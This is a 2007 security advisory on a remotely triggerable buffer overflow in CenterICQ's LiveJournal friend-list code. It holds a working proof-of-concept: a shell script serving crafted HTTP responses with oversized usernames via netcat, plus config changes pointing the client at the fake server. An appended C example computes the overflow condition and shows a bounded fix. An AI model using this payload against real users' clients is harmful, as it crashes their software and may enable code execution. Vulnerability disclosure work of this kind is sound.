========================================================================
TK53 Advisory #1 01/07/2007 - CenterICQ remote DoS buffer overflow in
LiveJournal handling
========================================================================

* Authors: Lolek of TK53, Roflek of TK53
* Affected program: CenterICQ (http://thekonst.net/centericq/)
* Affected versions: 4.9.11 - 4.21.0
* Overview: CenterICQ contains support for LiveJournal
  (http://www.livejournal.com/), such as posting to your own blog, reading
  other blogs' RSS feeds, and community-related functions such as showing
  whether a user has added you to or removed you from their friend list,
  all via the unified HTTP interface provided by LiveJournal. The latter
  functionality is vulnerable to a buffer overflow and possibly to remote
  code execution.

== Vulnerability Details ==

$SOURCE/src/hooks/ljhook.cc:

    char buf[512];
    ...
    if(find(friendof.begin(), friendof.end(), in->first) == friendof.end()) {
        friendof.push_back(in->first);

        if(!foempty) {
            bd = (string) "http://" + conf.getourid(proto).server + "/users/" + in->first;

            sprintf(buf, _("The user %s (%s) has added you to his/her friend list\n\nJournal address: %s"),
                in->first.c_str(), in->second.c_str(), bd.c_str());

            em.store(imnotification(self, buf));
        }
    }
    ...

CenterICQ regularly checks the server for the friends list (#define
PERIOD_FRIENDS 3600, i.e. the check is done every 3600 seconds). If the user
is already in the friend list of at least one other user, and another user
adds the user to his friend list, foempty gets true and the sprintf is
called, leading to a buffer overflow in buf. The lengths of the username
(in->first) and the real name (in->second) are completely unchecked.
This means that buf overflows if:

    2*length(username) + length(realname) + length(string literals) >= sizeof(buf)

The only reason this is not exploitable against the official LiveJournal
servers is that LiveJournal restricts the length of both the username (15
characters) and the real name (50 characters). But since the server used for
communication is configurable within CenterICQ, and since LiveJournal
provides its backend under the GPL, the risk of buffer overflow and
exploitation does exist.

== Proof of Concept Exploit ==

Add the following to your ~/.centericq/conf:

    lj_nick randomname
    lj_pass randompass
    lj_server localhost:8000
    lj_status o
    lj_importfriends 1

Start the following shell script, then CenterICQ, and be patient because of
the PERIOD_FRIENDS interval (3600 seconds, 1 hour), or change it to 10 or
whatever in the code and recompile. The shell script is a very simple
proof-of-concept demonstration of the buffer overflow:

--- SNIP ---
#!/bin/sh
cat > req1.txt << __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_count
1
success
OK
__EOF

cat > req2.txt << __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_2_bg
#ffffff
friendof_2_fg
#000000
friendof_2_name
foo
friendof_2_user
foo
friendof_count
2
success
OK
__EOF

cat > req3.txt << __EOF
HTTP/1.0 200 OK
Date: Sat, 06 Jan 2007 11:51:50 GMT
Server: Apache
Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/
Content-length: 558
Connection: close
Content-Type: text/plain

friend_1_bg
#ffffff
friend_1_fg
#000000
friend_1_name
jwz
friend_1_user
jwz
friend_2_bg
#ffffff
friend_2_fg
#000000
friend_2_name
LJ Maintenance
friend_2_type
community
friend_2_user
lj_maintenance
friend_3_bg
#ffffff
friend_3_fg
#000000
friend_3_name
LJ Spotlight
friend_3_type
community
friend_3_user
lj_spotlight
friend_4_bg
#ffffff
friend_4_fg
#000000
friend_4_name
LiveJournal News
friend_4_type
news
friend_4_user
news
friend_count
4
friendof_1_bg
#ffffff
friendof_1_fg
#000000
friendof_1_name
roflek
friendof_1_user
roflek
friendof_2_bg
#ffffff
friendof_2_fg
#000000
friendof_2_name
lolek
friendof_2_user
lolek
friendof_3_bg
#ffffff
friendof_3_fg
#000000
friendof_3_name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
friendof_3_user
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
friendof_count
3
success
OK
__EOF

netcat -lp 8000 < req1.txt
netcat -lp 8000 < req2.txt
netcat -lp 8000 < req3.txt
--- SNIP ---
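Added example (not part of the advisory or of CenterICQ): the overflow condition from the Vulnerability Details section written as a C check, evaluated for the official LiveJournal limits (15-character username, 50-character real name) and for a 300-character name like the one in the PoC, beside a bounded formatter that measures and allocates instead of writing into a fixed char buf[512]. The format string and the "http://" + server + "/users/" + username layout are the ones quoted from ljhook.cc above; BUF_SIZE, repeat(), notification_len(), would_overflow() and format_notification() are names chosen here, and the 300 x 'A' input is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF_SIZE 512   /* sizeof(buf) in ljhook.cc */
/* The ljhook.cc format string with the gettext _() wrapper removed. */
static const char *const FMT =
    "The user %s (%s) has added you to his/her friend list\n\nJournal address: %s";
/* Helper: malloc'd string of n copies of c (constructed test input). */
char *repeat(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s) { memset(s, c, n); s[n] = '\0'; }
    return s;
}

/* Bytes the notification needs, NUL included. The username is counted twice
 * (directly and inside the journal address): the 2*length(username) term. */
size_t notification_len(const char *user, const char *realname, const char *server)
{
    int journal = snprintf(NULL, 0, "http://%s/users/%s", server, user);
    return (size_t)journal + (size_t)snprintf(NULL, 0, FMT, user, realname, "") + 1;
}

/* 1 if sprintf() into char buf[BUF_SIZE] would write past the end of buf. */
int would_overflow(const char *user, const char *realname, const char *server)
{
    return notification_len(user, realname, server) > BUF_SIZE;
}

/* Bounded replacement for the sprintf(): measure, allocate, then format.
 * Returns a malloc'd string (caller frees) or NULL on allocation failure. */
char *format_notification(const char *user, const char *realname, const char *server)
{
    size_t jlen = (size_t)snprintf(NULL, 0, "http://%s/users/%s", server, user) + 1;
    char *journal = malloc(jlen);
    if (!journal) return NULL;
    snprintf(journal, jlen, "http://%s/users/%s", server, user);
    size_t mlen = (size_t)snprintf(NULL, 0, FMT, user, realname, journal) + 1;
    char *msg = malloc(mlen);
    if (msg) snprintf(msg, mlen, FMT, user, realname, journal);
    free(journal);
    return msg;
}

int main(void)
{
    char *big = repeat('A', 300);   /* constructed: the PoC's long friendof name */
    printf("300 x 'A' overflows buf[512]: %d\n", would_overflow(big, big, "localhost:8000"));
    free(big); return 0;
}
```

With the official limits the message stays well under 512 bytes, which is why the advisory notes it is only reachable through a configurable lj_server.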